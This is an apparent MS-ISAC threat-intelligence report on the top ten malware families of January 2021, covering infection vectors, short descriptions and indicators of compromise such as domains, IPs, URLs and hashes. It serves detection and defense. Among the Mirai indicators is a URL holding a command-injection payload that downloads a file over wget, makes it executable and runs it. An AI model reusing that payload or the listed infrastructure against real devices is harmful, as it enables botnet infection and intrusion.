Top 10 Malware January 2021

In January 2021, the MS-ISAC observed CoinMiner’s return to the Top 10, while Danabot made its first appearance. The Top 10 Malware variants make up 77% of the total malware activity in January 2021, increasing 5% from December 2020. Shlayer is highly likely to continue its prevalence in the Top 10 Malware due to post-holiday increase of schools and universities returning to in person teaching or a hybrid model.
 
Top-10-MS-ISAC-Malware-Notifications-January-2021
 
MS-ISAC-Malware-Notifications-January-2021
 

 

In January 2021, malvertisement accounted for the greatest number of alerts. Malvertisement maintains  the top initial infection vector due to Shlayer activity. Shlayer returned to the Top 10 Malware after new evidence resulted in it being reclassified as a trojan downloader compared to an adware dropper. Activity levels for malspam and malvertisement increased, while activity for dropped and multiple decreased. It is highly likely that malvertisement will remain the primary infection vector as the Shlayer campaign pans out.

Our Community Defense Model (CDM) v2.0 can help you defend against 77% of ATT&CK (sub-)techniques associated with malware – regardless of the infection vector they use. Learn more in the video below.

 

 

MS-ISAC-Malware-Infection-Venctors-January-2021

Dropped – Malware delivered by other malware already on the system, an exploit kit, infected third-party software, or manually by a cyber threat actor. Gh0st and Mirai are the only malware dropped.

Multiple – Malware that currently favors at least two vectors. Currently, CoinMiner and ZeuS are the only malware utilizing multiple vectors. ZeuS is dropped by other malware, but it is also delivered via malvertisement.

Malspam – Unsolicited emails, which either direct users to malicious web sites or trick users into downloading or opening malware. Top 10 Malware using this technique Agent Tesla, Danabot, Dridex, NanoCore, and Snugy.

Malvertisement – Malware introduced through malicious advertisements. Currently, Shlayer is the only Top 10 Malware using this technique.

Top 10 Malware and IOCs

Below are the Top 10 Malware ranked in order of prevalence. The respective indicators of compromise (IOCs) are provided to aid in detecting and preventing infections from these Top 10 Malware variants.

1. Shlayer

Shlayer is a downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertizing posing as a fake Adobe Flash updater. All Shlayer domains follow the same pattern <api.random_name.com>. Below area several examples of domains Shlayer uses.</api.random_name.com>

Domains

  • api.interfacecache[.]com
  • api.scalableunit[.]com
  • api.typicalconfig[.]com
  • api.standartanalog[.]com
  • api.fieldenumerator[.]com
  • api.practicalsprint[.]com
  • api.searchwebsvc[.]com
  • api.connectedtask[.]com
  • api.navigationbuffer[.]com
  • api.windowtask[.]com

2. Agent Tesla

Agent Tesla is a RAT that exfiltrates credentials, log keystrokes, and capture screenshots from an infected computer.

3. Snugy

Snugy is a PowerShell-based backdoor allowing the attacker to obtain the system’s hostname and to run commands. This backdoor communicates through a DNS tunneling channel on the compromised server.

4. ZeuS

ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of it’s codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.

Domains

  • Opaopa[.]info
  • Edmontonjournal[.]com

IPs

  •  8.208.90[.]18
  • 163.172.61{.}158
  • 185.244.217[.]126

URL

  • /gate.php
  • /index.php?image=pic1.png&mmcpw=C_Uahb8x81_oKUqzoMR5xjzrBD1wITOlGt4e
  • /index.php?image=pic1.png&punqqq=1w4vrLh7NI_hnnm5fIDzb0SgZQ3hpk9ZgtdIIdrf*0nm7mGXfRQiOJqp
  • /news/8101128.bin
  • /news/8101316.bin
  • /news/8101335.bin
  • /news/8101336.bin
  • /news/8101339.bin
  • /news/8101340.bin
  • /news/8101344.bin
  • /news/8107012.bin
  • /news/8107013.bin
  • /news/8107014.bin
  • /news/8107015.bin

5. Dridex

Dridex is a banking trojan which uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.

Domains

  • Oneyearnovel[.]com

6. Nanocore

Nanocore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

MD5

  • bf994dce3712fb66afa4a2ce5b3ceee4
  • e01c79d227c6315150f7ff0afe40db4c
  • 154a2366cd3e39e8625f5f737f9da8f1

7. Gh0st

Ghost is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device.

8. CoinMiner

CoinMiner is a cryptocurrency miner that uses Windows Management Instrumentation (WMI) and EternalBlue to spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence. CoinMiner spreads through malspam or is dropped by other malware.

SHA256 Hashes

  • a9e785de50216ab7987be7403d1bfcf4d7661ebcfdb8c27eb1525c919398ff7d

9. Danabot

Danabot is a banking trojan spread via malspam using malicious macros in Microsoft Office. It has the ability to steal credentials, collect information on the infected system, use web injection, and drop other malware, such as GootKit.

10. Mirai

Miraj is a malware botnet known to compromise internet of things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

Domains

  • cdn[.]liftoff[.]io

URL

  • /customers/4658fb8d67/images/v1/78cf84fdb7cfabbd8200.jpg
  • /customers/5a8e32ecee/images/v1/ecf1e61048.jpg
  • /customers/c4f77ab60c/images/v1/aa75cd2f99441664141a.jpg
  • /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
  • /lookup?bundleId=com.easybrain.puzzles